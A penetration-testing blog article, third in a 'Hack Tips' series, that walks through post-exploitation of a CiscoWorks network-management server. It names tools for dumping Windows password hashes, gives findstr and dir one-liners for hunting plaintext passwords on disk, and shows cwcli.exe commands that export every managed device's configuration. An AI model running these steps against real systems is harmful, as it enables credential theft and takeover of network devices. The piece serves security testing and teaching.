by Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL)--replaced by Cisco Prime Infrastructure (CPI), we still see this management product present in many environments--thus is it still useful to know how to get the goods from Works.

Overview

Overall, the process involves the following steps:

1. Identifying a CiscoWorks Server
2. Obtaining CiscoWorks Administrator Credentials
3. Interfacing with the CiscoWorks Web Interface
4. Interfacing with the CiscoWorks Command Line Interface
5. Dumping configs from CiscoWorks

Identifying The Host

1. Host naming scheme
   • \\CiscoWorksBox
   • \\CISCOWKS
   • \\NETMNG
2. Application Directory
   • C:\Program Files (x86)\CSCOpx
3. User accounts
   • causer (Ciscoworks anonymous access user)
     

     
     C:\ >net user
     
     User accounts for \\CiscoWorksDemoBox
     
     ----------------------------------------------------------
     casuser                  user                  user2
     user3
     The command completed successfully.
     
     

4. Services
   • These Windows services are started:

     
     C:\ >net start
     
     --SNIP--
        CiscoWorks ANI database engine
        CiscoWorks Daemon Manager
        CiscoWorks RME NG database engine
        CiscoWorks Tomcat Servlet Engine
        CiscoWorks Web Server
     
     

Identifying Ciscoworks Account Credentials

1. Dump the local Windows password hashes and crack them
   • Windows Credential Editor (WCE) by Amplia Security
   • hashdump a post-exploitation module in the Metasploit framework:
   • gsecdump by TrueSec
   • fgdump by fizzgig
2. Data mine the Cisco works box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful, network engineers are usually responsible for managing Ciscoworks and they are notorious for being security ignorant. We recently found a test .bat file that was using ut.exe (a Ciscoworks tool) that disclosed the Cisco Works credentials in plain-text.
   • findstr /I /S /M pass c:\*
   • dir /a /s /b c:\*pass*

Interacting with Ciscoworks

Next we'll take a look out how we can interact with Ciscoworks and pull data from it.

Using the Ciscoworks Web Interface

CiscoWorks interface and options post-authentication
Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Surf to either of the URLs below for nice screenshots and great summarizations

• http://hostname:1741
• https://hostname

From the local system, you can confirm Ciscoworks is listening by checking for a listener on TCP 1741, or TCP 443:

C:\> netstat -ano | findstr 1741
  TCP    0.0.0.0:1741           0.0.0.0:0              LISTENING       5136

C:\ >netstat -ano | findstr 443
  TCP    0.0.0.0:443           0.0.0.0:0              LISTENING       5136

Using the Ciscoworks Command line Application

The Ciscoworks command line application (cwcli.exe) have tons of options, including remotely running commands on devices! This could be very useful for an attacker, just use it with caution, because it could really get you into trouble if you don't know what you're doing!

Running cwclie.exe is more or less straightforward, but you'll definitely have to check out the -help for all features.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
------------------------------------
CiscoWorks command line Application.
------------------------------------
General syntax to run a command with arguments is
cwcli  

For detailed help on a command and it's arguments, run
cwcli  -help

Dumping Device Configs from CiscoWorks

One note worthy feature of cwclie.exe is its ability to dump device configurations from the command line! If you had an unlimited amount of time, you could obtain every config from every device on the network. Here's how to tell cwclie.exe to grab those configs.

C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u  -p  -device %

SUMMARY
========
        Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig

The % character is a wild card when using cwclie.exe. Using this, you could potentially dump all configuration from all Ciscoworks-managed devices! Just note that this could take a really long time on a large network. Also, its probably worth while for us to note that as a general best practice, system administrators should never use the -p option and specify the password on the command line -- this includes within scripts.

And just to confirm we dumped some configurations:

C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011  06:40 PM    <DIR>          .
12/25/2011  06:40 PM    <DIR>          ..
12/25/2011  06:40 PM            26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011  06:40 PM            26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011  06:40 PM            30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011  06:40 PM            27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011  06:40 PM            30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011  06:40 PM            30,833 2011-11-09-06-40-31-247-devicename.xml
               6 File(s)        173,101 bytes
               2 Dir(s)  129,615,876,096 bytes free

Enjoy!